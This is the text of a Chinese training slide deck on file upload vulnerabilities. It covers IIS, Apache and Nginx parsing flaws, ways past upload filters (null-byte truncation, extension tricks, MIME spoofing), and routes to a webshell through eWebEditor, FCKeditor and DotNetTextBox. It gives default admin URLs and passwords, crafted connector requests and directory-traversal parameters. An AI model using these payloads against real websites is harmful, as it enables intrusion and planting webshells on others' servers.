You are on page 1of 31

上传漏洞

 本课程重点讲解文件解析漏洞,文
件上传漏洞以及常见编辑器漏洞的
利用。
 学习完此课程,您将会:
 掌握常见的解析漏洞
 掌握上传漏洞的利用方法
 掌握常见编辑器漏洞利用
第 1 节 文件解析漏洞
第 2 节 文件上传漏洞
第 3 节 常见编辑器漏洞
文件解析漏洞
IIS 6.0 解析漏洞
① 目录解析
/test.asp/test.jpg
② 文件解析
/test.asp;1.jpg

IIS6.0 默认的可执行文件除了 asp 还包含这三种


①/test.asa
②/test.cer
③/test.cdx
文件解析漏洞

Apache 解析漏洞

Apache 是从右到左开始判断解析,如果为
不可识别解析,就再往左判断。

/test.php.xxx
/test.php.rar
文件解析漏洞

Nginx 解析漏洞

影响版本 :
0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

/test.jpg/1.php
/test.jpg%00.php
第 1 节 文件解析漏洞
第 2 节 文件上传漏洞
第 3 节 常见编辑器漏洞
文件上传漏洞
上传

 客户端检测 (javascript 检测扩展名 )


 服务端检测 (MIME 类型检测,检测 Content-Ty
pe 内容 )
 服务端检测 ( 文件头检测 )
 服务端检测 ( 检测跟 path 参数相关的内容 )
 服务端检测 ( 文件扩展名检测 )
文件上传漏洞
 客户端检测 (javascript 检测扩展名 )

刚选择要上传的文件,就弹出一个警告框
文件上传漏洞
 客户端检测 (javascript 检测扩展名 )
利用火狐的插件禁用 javascript
文件上传漏洞
 服务端检测 (MIME 类型检测,检测 Content-Type 内容 )
文件上传漏洞
 服务端检测 ( 文件头检测 )
文件上传漏洞
 服务端检测 ( 目录路径检测 )
文件上传漏洞

服务端检测 ( 文件扩展名检测 )

① 黑名单
文件名大小写绕过、名单列表绕过 ( 如 asa,cer,cdx,php3
等 ) 、 0x00 截断
② 白名单
解析漏洞、 0x00 截断
文件上传漏洞

PUT 方法
第 1 节 文件解析漏洞
第 2 节 文件上传漏洞
第 3 节 常见编辑器漏洞
常见编辑器漏洞
 eWebEditor 编辑器获取 webshell

默认后台:
http://www.test.com/ewebeditor/admin_login.asp
http://www.test.com/ewebeditor/eWebEditor.asp

默认口令:
admin/admin
amdin/admin888

默认数据库地址:
http://www.test.com/ewebeditor/db/ewebeditor.mdb
常见编辑器漏洞
 eWebEditor 编辑器获取 webshell
常见编辑器漏洞
 eWebEditor 编辑器获取 webshell
常见编辑器漏洞
 FCKeditor 编辑器获取 webshell

FCK for asp 版本:

上传页面:
http://www.xxx.com/FCKeditor/editor/filemanager/connectors/tes
t.html#
http://www.xxx.com/fckeditor/editor/filemanager/browser/defaul
t/browser.html?Connector=http://www.xxx.com/fckeditor/editor/f
ilemanager/connectors/asp/connector.asp
常见编辑器漏洞
 FCKeditor 编辑器获取 webshell

FCK for asp 版本:

突破建立文件夹:
http://www.xxx.com/FCKeditor/editor/filemanager/connectors/asp
/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/
xxx.asp&NewFolderName=z&uuid=1244789975684

结合 IIS 解析漏洞
点被替换成下划线 → 二次上传
常见编辑器漏洞
 FCKeditor 编辑器获取 webshell

FCK for php 版本:

上传页面:
http://www.xxx.com/FCKeditor/editor/filemanager/connectors/tes
t.html#
http://www.xxx.com/fckeditor/editor/filemanager/browser/defaul
t/browser.html?Connector=http://www.xxx.com/fckeditor/editor/f
ilemanager/connectors/php/connector.php

结合 Apache 解析漏洞
点被替换成下划线 → 二次上传
常见编辑器漏洞
 FCKeditor 编辑器获取 webshell

FCK for php 版本:

某些版本中的 media 文件夹未做过滤,直接上传 php 脚本:


http://www.xxx.com/FCKeditor/editor/filemanager/connectors/php
/connector.php?Command=GetFoldersAndFiles&Type=Media&CurrentFo
lder=%2F
常见编辑器漏洞
 FCKeditor 编辑器获取 webshell

FCK for php 版本:

FCKeditor <= 2.6.4 , %00 截断:


http://www.wooyun.org/bugs/wooyun-2010-01684
常见编辑器漏洞
 FCKeditor 编辑器获取 webshell

FCK for jsp 版本:

上传页面:
http://www.xxx.com/FCKeditor/editor/filemanager/browser/defaul
t/browser.html?Type=../&Connector=connectors/jsp/connector
常见编辑器漏洞
 FCKeditor 编辑器获取 webshell

FCK for jsp 版本:

跳目录:
http://www.xxx.com/fckeditor/editor/filemanager/browser/defaul
t/browser.html?Type=../../../../../&Connector=connectors/jsp/c
onnector

上传 jsp 不解析 → 上传 jspx


常见编辑器漏洞
 DotNetTextBox 编辑器获取 webshell

http://www.xxx.com/system_dntb/Advanced.aspx
利用 firebug 修改添加上传文件类型,将更新按钮设置成 enable
常见编辑器漏洞
 DotNetTextBox 编辑器获取 webshell

http://www.xxx.com/system_dntb/uploadFile.aspx
利用 firebug 将浏览和上传设置成 enable ,直接上传添加的后缀文件
本章总结

总结  掌握常见的解析漏洞
 掌握常见的上传突破方法
 掌握常见编辑器漏洞的利用

You might also like